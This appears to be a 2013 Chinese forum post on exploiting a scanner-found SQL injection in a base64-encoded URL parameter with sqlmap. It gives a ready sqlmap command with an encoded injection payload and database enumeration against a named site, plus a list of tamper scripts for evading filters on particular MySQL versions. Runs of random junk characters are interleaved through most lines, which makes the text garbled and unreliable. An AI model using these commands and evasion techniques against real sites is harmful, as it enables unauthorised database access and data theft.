WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?+ N8 `1 {- F }0 U
' j; G& n- \; u0 ssqlmap的tamper里有个base64encode.py- O( g( ~- J2 h% F6 M$ j
. v: q' L) {5 t9 O9 ^. F
使用如下
8 L$ X P9 O2 {+ t8 x. i* J: S
( B2 f4 g! {! K/ ~sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
& i J! R. \- O' k1 k0 C' w4 m9 l" r4 f- [+ n5 E
/ d9 |8 j; C. T5 I) msqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
+ p2 V# p- x2 g: m2 w7 o4 C* T! }; t4 g3 W
其中常用到的bypass脚本绕过SQLMAP主要两个脚本: W* V9 i6 h$ ~2 \
0 q1 f+ E/ k# x% a& {4 U* I H
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入1 d- ~" O. G3 a* n. _
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
/ Z( _, y# H0 G. k" u首先确定目标数据库版本,然后选择相应的脚本。
8 G( C* D5 H7 X-v 3 --batch --tamper "space2hash.py"& O$ M6 S3 j: a. P) O
' x* T5 a9 J2 _/ d% ?, ?% ~还有其他一些插件:( c: Y, z+ e- {* I3 I4 T! p
encodes编码 ——charencode.py% d1 ]: {4 R( O) ~
base64编码 —— base64encode.py
3 k7 y W T4 o9 a) r, { d替换空格和关键字 —— halfversionedmorekeywords.py
' K% w' i: n1 B0 p% y( R |
3 R; t' e8 O4 o
, P+ [8 I+ i6 P3 g- I$ T# _0 u, |$ X7 k
0 B, d1 K) P6 k$ {% S4 {
|
发表于 2013-11-23 15:50:45
收藏
支持
反对